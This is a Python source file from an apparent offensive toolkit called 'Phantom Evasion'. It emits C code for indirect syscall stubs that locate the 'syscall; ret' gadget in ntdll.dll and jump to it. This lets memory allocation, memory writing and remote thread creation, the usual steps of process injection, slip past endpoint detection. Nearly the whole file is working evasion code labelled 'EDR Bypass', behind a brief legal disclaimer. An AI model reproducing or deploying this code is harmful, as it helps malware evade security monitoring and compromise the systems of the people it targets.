"""
Phantom Evasion - Indirect Syscalls EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_indirect_syscalls() -> Dict[str, Any]:
    """Generate indirect syscall stubs that jump to the ``syscall`` instruction
    inside ntdll.dll instead of emitting it directly.

    This bypasses EDRs that detect the ``syscall`` opcode (0F 05) in
    unexpected executable regions by ensuring the instruction executes
    within the legitimate ntdll.dll address space.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Indirect Syscalls – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Locates the "syscall; ret" gadget inside ntdll.dll and jumps to it,
// ensuring the syscall instruction executes from within ntdll's .text section.

#include <windows.h>

#ifndef __PHANTOM_INDIRECT_SYSCALLS_DEFINED__
#define __PHANTOM_INDIRECT_SYSCALLS_DEFINED__

// Populated by find_syscall_gadget()
static LPVOID g_syscall_gadget = NULL;

// Syscall service numbers (resolved at runtime)
// Shared SSN variable guard: defined here if not already defined by direct_syscalls.
#ifndef __PHANTOM_SSN_VARS_DEFINED__
#define __PHANTOM_SSN_VARS_DEFINED__
static DWORD ssn_NtAllocateVirtualMemory = 0;
static DWORD ssn_NtWriteVirtualMemory    = 0;
static DWORD ssn_NtProtectVirtualMemory  = 0;
static DWORD ssn_NtCreateThreadEx        = 0;
#endif /* __PHANTOM_SSN_VARS_DEFINED__ */

/**
 * Scan ntdll.dll for the first "syscall; ret" byte sequence (0F 05 C3).
 * Returns pointer to the syscall instruction.
 */
static LPVOID find_syscall_gadget(void) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return NULL;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hNtdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE *)hNtdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (memcmp(sec->Name, ".text", 5) == 0) {
            BYTE *start = (BYTE *)hNtdll + sec->VirtualAddress;
            BYTE *end   = start + sec->Misc.VirtualSize - 2;
            for (BYTE *p = start; p < end; p++) {
                if (p[0] == 0x0F && p[1] == 0x05 && p[2] == 0xC3)
                    return (LPVOID)p;
            }
        }
    }
    return NULL;
}

// ── Indirect NtAllocateVirtualMemory ────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtAllocateVirtualMemory(
        HANDLE ProcessHandle, PVOID *BaseAddress,
        ULONG_PTR ZeroBits, PSIZE_T RegionSize,
        ULONG AllocationType, ULONG Protect) {
    __asm__ volatile (
        "movl %0, %%eax\n\t"
        "movq %%rcx, %%r10\n\t"
        "jmp *%1\n\t"
        :
        : "m"(ssn_NtAllocateVirtualMemory), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// ── Indirect NtWriteVirtualMemory ───────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtWriteVirtualMemory(
        HANDLE ProcessHandle, PVOID BaseAddress,
        PVOID Buffer, SIZE_T NumberOfBytesToWrite,
        PSIZE_T NumberOfBytesWritten) {
    __asm__ volatile (
        "movl %0, %%eax\n\t"
        "movq %%rcx, %%r10\n\t"
        "jmp *%1\n\t"
        :
        : "m"(ssn_NtWriteVirtualMemory), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// ── Indirect NtCreateThreadEx ────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtCreateThreadEx(
        PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess,
        POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle,
        PVOID StartRoutine, PVOID Argument,
        ULONG CreateFlags, SIZE_T ZeroBits,
        SIZE_T StackSize, SIZE_T MaximumStackSize,
        PVOID AttributeList) {
    __asm__ volatile (
        "movl %0, %%eax\n\t"
        "movq %%rcx, %%r10\n\t"
        "jmp *%1\n\t"
        :
        : "m"(ssn_NtCreateThreadEx), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// Call this once before using indirect syscalls:
//   g_syscall_gadget = find_syscall_gadget();

#endif /* __PHANTOM_INDIRECT_SYSCALLS_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Indirect syscall stubs that jump to ntdll.dll syscall;ret gadget",
        "layer": "Layer 2 - EDR Bypass",
        "name": "indirect_syscalls",
    }
